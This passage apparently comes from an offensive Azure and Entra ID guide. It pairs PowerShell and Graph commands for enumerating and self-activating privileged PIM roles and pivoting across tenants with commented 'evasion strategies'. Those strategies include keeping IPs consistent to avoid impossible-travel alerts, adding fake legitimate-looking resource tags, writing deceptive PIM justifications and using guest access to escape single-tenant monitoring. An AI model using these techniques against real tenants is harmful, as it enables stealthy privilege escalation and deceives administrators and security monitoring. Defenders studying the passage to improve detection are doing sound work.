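$graphToken = (Get-AzAccessToken -ResourceUrl "https://graph.microsoft.com/").Token
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me" -Headers @{
    'Authorization' = "Bearer $graphToken"
    'User-Agent'    = $headers['User-Agent']
}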
# Strategy 2: Consistent source IPs
# Use same VPN/proxy for all operations
# Avoid impossible travel scenarios
# Strategy 3: Device compliance
# If possible, operate from Intune-managed devices
# Compliant devices trigger fewer alerts
# Strategy 4: Application consistency
# Use same application IDs for all operations
# Avoid switching between PowerShell, CLI, Portal, etc.
# Strategy 5: Metadata manipulation
# Some resources allow custom metadata
# Use legitimate-looking metadata
# Merge legitimate-looking tags without replacing the resource's existing tag set
Update-AzTag -ResourceId $resourceId -Operation Merge -Tag @{
    Owner      = "IT-Operations"
    Department = "Infrastructure"
    CostCenter = "CC-1234"
    ManagedBy  = "Terraform"
}
# OPSEC: Consistent patterns are less suspicious
# Metadata makes resources appear legitimate
# Device compliance bypasses many security checks
11. PIM (Privileged Identity Management) Awareness:#
# PIM provides just-in-time privileged access
# Activations are logged and time-limited
# Check if PIM is enabled
# (Requires RoleManagement.Read.Directory or RoleEligibilitySchedule.Read.Directory)
Get-MgRoleManagementDirectoryRoleEligibilitySchedule -All
# List your eligible roles
$currentUser = Get-MgUser -UserId (Get-MgContext).Account   # resolve signed-in UPN to a user object
Get-MgRoleManagementDirectoryRoleEligibilitySchedule -Filter "principalId eq '$($currentUser.Id)'" -All
# EVASION STRATEGIES:
# Strategy 1: Activate roles during business hours
# Activation requests during off-hours may trigger alerts
# Strategy 2: Use maximum allowed duration
# Minimize number of activations (each is logged)
# Strategy 3: Provide legitimate-sounding justification
# PIM requires justification for activation
# Use business-appropriate reasons: "Incident response", "Backup restore", "Configuration update"
# Strategy 4: Avoid activating suspicious roles
# Global Administrator activation is heavily monitored
# Use lower-privilege roles if possible (Security Reader, etc.)
# Activate PIM role (example)
# This is typically done via Portal or Microsoft.Graph API
# New-MgRoleManagementDirectoryRoleAssignmentScheduleRequest cmdlet
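A hedged sketch of a self-activation request via Graph PowerShell (the role definition ID and duration are placeholders; required fields such as ticket info can vary with tenant PIM policy):
# Self-activate an eligible role - PrincipalId must be the current user's object ID
$params = @{
    Action           = "selfActivate"
    PrincipalId      = $currentUser.Id
    RoleDefinitionId = "<role-definition-id>"   # taken from the eligibility schedule output above
    DirectoryScopeId = "/"
    Justification    = "Configuration update"
    ScheduleInfo     = @{
        StartDateTime = (Get-Date).ToUniversalTime()
        Expiration    = @{ Type = "AfterDuration"; Duration = "PT4H" }
    }
}
New-MgRoleManagementDirectoryRoleAssignmentScheduleRequest -BodyParameter $params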
# OPSEC: PIM activations generate immediate alerts to administrators
# All PIM activity is logged with justification
# Use sparingly and only when necessary
12. Multi-Tenant Awareness:#
# Azure supports multi-tenant applications
# Guest users in multiple tenants can pivot
# Enumerate tenants you have access to
Get-AzTenant
# Switch between tenants
Connect-AzAccount -Tenant "target-tenant-id"
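A quick sweep of which subscriptions are reachable in each tenant (each tenant may require its own authentication / MFA):
# Enumerate accessible subscriptions per tenant
foreach ($tenant in Get-AzTenant) {
    Get-AzSubscription -TenantId $tenant.Id | Select-Object Name, Id, TenantId
}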
# EVASION STRATEGIES:
# Strategy 1: Use different identities per tenant
# Avoid linking activities across tenants
# Strategy 2: Leverage guest access
# Guest users have different logging characteristics
# May be overlooked in security monitoring
# Strategy 3: Cross-tenant applications
# Applications can be authorized in multiple tenants
# Service principal in one tenant accessing another
# Check for service principals whose owning application lives in another tenant
# ('ne' is an advanced Graph query - requires ConsistencyLevel eventual and a count)
$currentTenantId = (Get-MgContext).TenantId
Get-MgServicePrincipal -All -Filter "appOwnerOrganizationId ne '$currentTenantId'" -ConsistencyLevel eventual -CountVariable spCount
# OPSEC: Multi-tenant operations may escape single-tenant SIEM
# Guest users often have less stringent monitoring
# Cross-tenant resource access is common in enterprises